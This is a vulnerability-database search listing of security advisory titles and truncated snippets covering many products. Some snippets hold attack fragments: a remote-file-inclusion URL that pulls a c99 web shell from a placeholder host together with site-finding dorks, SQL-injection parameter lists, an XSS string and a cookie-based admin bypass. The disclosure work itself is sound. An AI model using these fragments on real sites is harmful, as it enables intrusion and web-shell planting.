47153 matches found
3Com OfficeConnect Wireless Cable/DSL Router Authentication Bypass
==================================================== Security Research Advisory Vulnerability name: "3Com OfficeConnect Wireless Cable/DSL Router Authentication Bypass" Advisory number: LC-2008-05 Advisory URL: http://www.ikkisoft.com ==================================================== 1 Affecte...
Эксплоит для эксплуатации уязвимости EZSA-2008-003
Эксплоит для эксплуатации уязвимости EZSA-2008-003. Описание: Уязвимость связана с недостаточной проверкой при регистрации нового пользователя /user/register. Успешная эксплуатация уязвимости позволяет получить привилегии администратора CMS. Уязвимости подвержены приложения ez publish начиная с...
[SECURITY] [DSA 1638-1] New openssh packages fix denial of service
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1638-1 [email protected] http://www.debian.org/security/ Florian Weimer September 16, 2008 http://www.debian.org/security/faq -...
[CVE-2008-1232] Apache Tomcat XSS vulnerability
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2008-1232: Apache Tomcat XSS vulnerability Severity: Low Vendor: The Apache Software Foundation Versions Affected: Tomcat 4.1.0 to 4.1.37 Tomcat 5.5.0 to 5.5.26 Tomcat 6.0.0 to 6.0.16 The unsupported Tomcat 3.x, 4.0.x and 5.0.x versions may be als...
ALL VERSİON PHPAUTOVİDEO c99 shell
ALL VERSON PHPAUTOVDEO AUTHOR : S@BUN HOME : http://www.hackturkiye.com/ DorKs 1 : "powered by phpAutoVideo" DORKS 2 : Copyright © 2007 Agares Media DORKS 3 : allinurl: "playvideo.php?video" EXPLOIT : wwww.xxxxxx.com/admin/frontpageright.php?loadadminpage=http:xxxxx.c99.txt? S@BUN...
ehomes [multiples injections sql]
vendor site: http://enthrallweb.us/ product : ehomes bug:injection sql risk : medium injection sql : /dircat.asp?cid='sql /dirSub.asp?sid='sql /types.asp?TYPEID='sql /homeDetail.asp?ADID='sql /result.asp?city=1&cat='sql /compareHomes.asp?compare='sql /compareHomes.asp?compare=Compare&clear='sql...
Newswriter SW <= 1.42 (NWCONF_SYSTEM[server_path]) Remote File Inclusion Vulnerability
============================================================================================== Newswriter SW = 1.42 NWCONFSYSTEMserverpath Remote File Inclusion Vulnerability =============================================================================================== Critical Level : Dangerous...
ZH2003-31SA (security advisory): file inclusion vulnerability in cpCommerce
ZH2003-31SA security advisory: file inclusion vulnerability in cpCommerce Published: 19 October 2003 Name: cpCommerce Affected Versions: 0.05f and other versions? Vendor: http://www.cpcommerce.org Issue: file inclusion vulnerability Author: Astharot at Zone-H.org Description Zone-H Security Team...
XSS and Path Disclosure in Sage
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: XSS and Path Disclosure in Sage product: Sage 1.0b3 vendor: http://sage.dev.box.sk/ risk: middle date: 02/20/2k3 discovered by: euronymous /f0kp /r00tc0de advisory urls: http://f0kp.iplus.ru/bz/015.en.txt http://f0kp.iplus.ru/bz/015.ru.txt...
SECURITY.NNOV: Outlook Express address book vulnerability
Issue : Outlook Express address book allows messages to be intercepted by 3rd party Date Released : 16 March 2001 Vendor Notified : 16 March 2001 Author : 3APA3A [email protected] Affected : Outlook Exress 5.5SP1 and prior Discovered : 18 December 2000 by 3APA3A Remotely Exploitable : Yes...
Security Advisory: Hassan Consulting's shop.cgi Directory Traversal Vulnerability.
October 7, 2000 Security Advisory shop.cgi.ad-1.00-10 : Hassan Consulting's Shopping Cart shop.cgi Directory Traversal Vulnerability Affected Product: Hassan Consulting's Shopping Cart shop.cgi/shop.pl Version 1.18 possibly others aswell Affected Platforms: Unix Windows Overview: Hassan...
Black Watch Labs Vulnerability Alert
Dear Security Professional, The following vulnerability: "Environment and Setup Variables Can Be Viewed Through DBMan db.cgi Script" is in the text of the message below and has just been posted to the Black Watch Labs Web site at http://www.perfectotech.com/blackwatchlabs/ Thank you, Black Watch...
Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities
Over 150 vulnerabilities in different applications are closed in auqrterly update...
[SECURITY] [DSA 3075-1] drupal7 security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3075-1 [email protected] http://www.debian.org/security/ Salvatore Bonaccorso November 20, 2014 http://www.debian.org/security/faq -...
[security bulletin] HPSBMU02998 rev.1 - HP System Management Homepage (SMH) running OpenSSL on Linux and Windows, Remote Disclosure of Information
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04239372 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04239372 Version: 1 HPSBMU02998 rev....
ESA-2013-039: RSA BSAFE® SSL-J Multiple Vulnerabilities
ESA-2013-039.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2013-039: RSA BSAFE® SSL-J Multiple Vulnerabilities EMC Identifier: ESA-2013-039 CVE Identifier: CVE-2011-3389, CVE-2013-0169 Severity Rating: CVSS v2 Base Score: Refer NVD http://nvd.nist.gov/ for individual scores for each CVE...
APPLE-SA-2014-02-25-1 OS X Mavericks 10.9.2 and Security Update 2014-001
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-02-25-1 OS X Mavericks 10.9.2 and Security Update 2014-001 OS X Mavericks 10.9.2 and Security Update 2014-001 is now available and addresses the following: Apache Available for: OS X Lion v10.7.5, OS X Lion Server v10.7.5, OS X Mountain...
TPTI-09-08: HP OpenView NNM ovlogin.exe CGI userid/passwd Heap Overflow Vulnerability
TPTI-09-08: HP OpenView NNM ovlogin.exe CGI userid/passwd Heap Overflow Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-09-08 December 9, 2009 -- CVE ID: CVE-2009-3846 -- Affected Vendors: Hewlett-Packard -- Affected Products: Hewlett-Packard OpenView Network Node Manager --...
TPTI-09-09: HP OpenView NNM ovsessionmgr.exe userid/passwd Heap Overflow Vulnerability
TPTI-09-09: HP OpenView NNM ovsessionmgr.exe userid/passwd Heap Overflow Vulnerability http://dvlabs.tippingpoint.com/advisory/TPTI-09-09 December 9, 2009 -- CVE ID: CVE-2009-4176 -- Affected Vendors: Hewlett-Packard -- Affected Products: Hewlett-Packard OpenView Network Node Manager --...
CVE-2009-3586: CoreHTTP web server off-by-one buffer overflow vulnerability
census ID: census-2009-0003 URL: http://census-labs.com/news/2009/12/02/corehttp-web-server/ CVE ID: CVE-2009-3586 Affected Products: CoreHTTP web server versions = 0.5.3.1. Class: Improper Input Validation CWE-20, Failure to Constrain Operations within the Bounds of a Memory Buffer CWE-119 Remot...
ZDI-09-085: Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability
ZDI-09-085: Hewlett-Packard Operations Manager Server Backdoor Account Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-09-085 November 20, 2009 -- CVE ID: CVE-2009-3843 -- Affected Vendors: Hewlett-Packard -- Affected Products: Hewlett-Packard OpenView Operations...
[USN-612-2] OpenSSH vulnerability
=========================================================== Ubuntu Security Notice USN-612-2 May 13, 2008 openssh vulnerability CVE-2008-0166, http://www.ubuntu.com/usn/usn-612-1 =========================================================== A weakness has been discovered in the random number...
[Full-disclosure] Utopia News Pro version 1.4.0 XSS Attack Vulnerability
netVigilance Security Advisory 34 Utopia News Pro version 1.4.0 XSS Attack Vulnerability Description: Utopia News Pro is a powerful and scalable news management system for any web site. News Pro, written in PHP and backed by the renowned MySQL database system, Utopia Software's News Pro is an ide...
Medium Risk Vulnerability in PGP Desktop
Peter Winter-Smith of NGSSoftware has discovered a medium risk vulnerability in PGP Desktop which can allow a remote authenticated attacker to execute arbitrary code on a system on which PGP Desktop is installed. The vulnerability resides within the Windows Service which PGP Desktop installs whic...
MiniBB Forum <= 1.5a Remote File Include (news.php)
Title : MiniBB Forum = 1.5a Remote File Include news.php Discovered By AG-Spider ----------------------------------------------------------------------------- Affected software description : Application : MiniBB Forum 1.5a news.phpversion : version 1.5 exploit :Remote File Include...
MySQL user defined functions multiple vulnerabilities
Buffer overflow on oversized user defined function name. DoS, directory traversal and privilege escalation on external functions invocation...
Security holes : PHP Image View, NewsPro, Photo DB, As_web, GuestBook
Hi all : 1 PHP Image View 1.0 http://www.onlinetools.org Problems : - XSS - phpinfo; Exploits : - /phpimageview.php?pw=show - /phpimageview.php?pic=javascript:alertdocument.domain 2 NewsPro 1.01 http://www.aspbin.co.uk Problem : - Admin access Exploit : - Set cookie "logged,true" on the...
Insecure input balidation in YaBB Search.pl
Hi Everybody, Kosak reported this problem to vuln-dev last night. I downloaded the script and did some testing. There is an input validation problem with the 'catsearch' field, which gets interpolated in an open statement: openFILE, "$boardsdir/$cattosearch" || &fatalerror"$txt'23'...
SYSS-2015-033: Missing Function Level Access Control (CWE-935) in Page2Flip Premium App 2.5
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-033 Product: Page2Flip Vendor: w!ssenswerft GmbH Affected Versions: Premium App 2.5, probably also in Business App and Basic App, and in lower versions Tested Versions: Premium App 2.5 Vulnerability Type: Missing Function Leve...
BFS-SA-2015-001: Internet Explorer CTreeNode::GetCascadedLang Use-After-Free Vulnerability
Blue Frost Security GmbH https://www.bluefrostsecurity.de/ researchatbluefrostsecurity.de BFS-SA-2015-001 12-August-2015 Vendor: Microsoft, http://www.microsoft.com Affected Products: Internet Explorer Affected Version: IE 8-11 Vulnerability: CTreeNode::GetCascadedLang Use-After-Free Vulnerabilit...
Alienvault OSSIM/USM Multiple Vulnerabilities
Details ======= Product: Alienvault OSSIM/USM Vulnerability: Multiple Vulnerabilities XSS, SQLi, Command Execution Author: Peter Lapp, [email protected] CVE: None assigned Vulnerable Versions: Tested on 4.14, 4.15, and 5.0. It likely affects all previous versions as well. Fixed Version: No fix ha...
SEC Consult SA-20150227-0 :: Multiple vulnerabilities in Loxone Smart Home
SEC Consult Vulnerability Lab Security Advisory 20150227-0 ======================================================================= title: Multiple vulnerabilities product: Loxone Smart Home vulnerable version: Firmware: 5.49; Android-App: 3.4.1 fixed version: 6.3 impact: High homepage:...
[slackware-security] php (SSA:2014-356-02)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 slackware-security php SSA:2014-356-02 New php packages are available for Slackware 14.0, 14.1, and -current to fix security issues. Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+...
CVE-2014-2025 Remote Code Execution (RCE) in "Intrexx Professional"
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 CVE-2014-2025 =================== "Remote Code Execution RCE via Unrestricted File Upload" CWE-434 vulnerability in "Intrexx Professional" product Vendor =================== United Planet GmbH Product =================== "Intrexx is an integrated...
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...
Barracuda Networks #35 Web Firewall 610 v6.0.1 - Filter Bypass & Persistent Vulnerability
Document Title: =============== Barracuda Networks 35 Web Firewall 610 v6.0.1 - Filter Bypass & Persistent Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1101 Barracuda Networks Security ID BNSEC: BNSEC-2361...
HP / 3COM / H3C switches security vulnerabilities
Code execution, information leakage...
[SECURITY] [DSA 2438-1] raptor security update
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2438-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff March 22, 2012 http://www.debian.org/security/faq -...
[CVE-2011-3645] Multiple vulnerability in "Omnidocs"
Hi All, I would like to inform about multiple vulnerability in NewGen's Omnidocs application. Exploit Title: Multiple Vulnerability in "Omnidocs" Author: Sohil Garg CVE : CVE-2011-3645 Product Description: OmniDocs is an Enterprise Document Management EDM platform for creating, capturing,...
Advisory: Range header DoS vulnerability Apache HTTPD 1.3/2.x (CVE-2011-3192)
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Apache HTTPD Security ADVISORY ============================== UPDATE 2 Title: Range header DoS vulnerability Apache HTTPD 1.3/2.x CVE: CVE-2011-3192 Last Change: 20110826 1030Z Date: 20110824 1600Z Product: Apache HTTPD Web Server Versions: Apache 1.3...
XSS vulnerability in CMSimple
Vulnerability ID: HTB22558 Reference: http://www.htbridge.ch/advisory/xssvulnerabilityincmsimple.html Product: CMSimple Vendor: Peter Andreas Harteg http://www.cmsimple.org/ Vulnerable Version: 3.3 and Probably Prior Versions Vendor Notification: 02 August 2010 Vulnerability Type: XSS Cross Site...
BSD-based systems (FreeBSD, NetBSD, OpenBSD) index array overflow
Index array overflow in libc gdtoa function used by printf...
Team SHATTER Security Advisory: Buffer Overflow in Resource Manager of Oracle Database - Plan name parameter
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Team SHATTER Security Advisory Buffer Overflow in Resource Manager of Oracle Database - Plan name parameter August 27, 2009 Risk Level: Medium Affected versions: Oracle Database Server version 9iR1 and 9iR2 Remote exploitable: Yes Authentication to...
Cross Site Scripting (XSS) in Owl <=0.95, CVE-2008-3100
Cross Site Scripting XSS in Owl =0.95, CVE-2008-3100 References: https://vulners.com/cve/CVE-2008-3100 http://owl.sourceforge.net/ http://www.datensalat.eu/fabian/cve/CVE-2008-3100-Owl.html Description: Owl is a multi user document repository knowledgebase system for publishing files/documents on...
phpTournois <= G4 Remote File Upload/Code Execution Exploit
?php / Name: phpTournois = G4 Remote File Upload/Code Execution Exploit Credits: Charles "real" F. charlesfolathotmail.fr Date: 04-06-08 - Remote Code Execution - Remote File Upload When testing if we are admin, phpTournois checks if $grade'a'=='a'. But when we are not loggued in, this var is not...
Cisco multiple devices DoS
Denial of service on ASN.1 parsing due to vulnerability in cryptographics library...
Уязвимость в Денвере-2: XSS
Здравствуйте, vuln. Найдена уязвимость типа XSS в пакете для web-разработчика Денвер-2 http://www.denwer.ru/ Пример: www.site.ru/scriptalert'XSS!'/script появится страница с сообщением об ошибке 403 и выполнится скрипт Уязвимость возможна из-за ошибки в файле, появляющемся при ошибке 403. Его...
[Full-Disclosure] Emulex FibreChannel Hub Vulnerable to SNMP DoS Attack
-----BEGIN PGP SIGNED MESSAGE----- SGI Security Advisory Title : Emulex FibreChannel Hub Vulnerable to SNMP DoS Attack Number : 20030703-01-I Date : July 25, 2003 Reference : CERT CA-2002-03 Reference : CVE CAN-2002-0013 Reference : SGI BUG 882516 Fixed in : See Workaround SGI provides this...
Progress Database vulnerabilities
strcpy and pstcopy dbutpstcopy are BAD!@@!$! you need to make use of strncpy or invent pstncopy This is straight from the unix man pages for strcpy NAME strcpy, strncpy - copy a string SYNOPSIS include string.h char strcpychar dest, const char src; BUGS If the destination string of a strcpy is no...
Sqlbuddy Path Traversal Vulnerability
Exploit Author: John Page hyp3rlinx Website: hyp3rlinx.altervista.org/ Vendor Homepage: www.sqlbuddy.com Version: 1.3.3 SQL Buddy is an open source web based MySQL administration application. Advisory Information: ================== sqlbuddy suffers from directory traversal whereby a user can mov...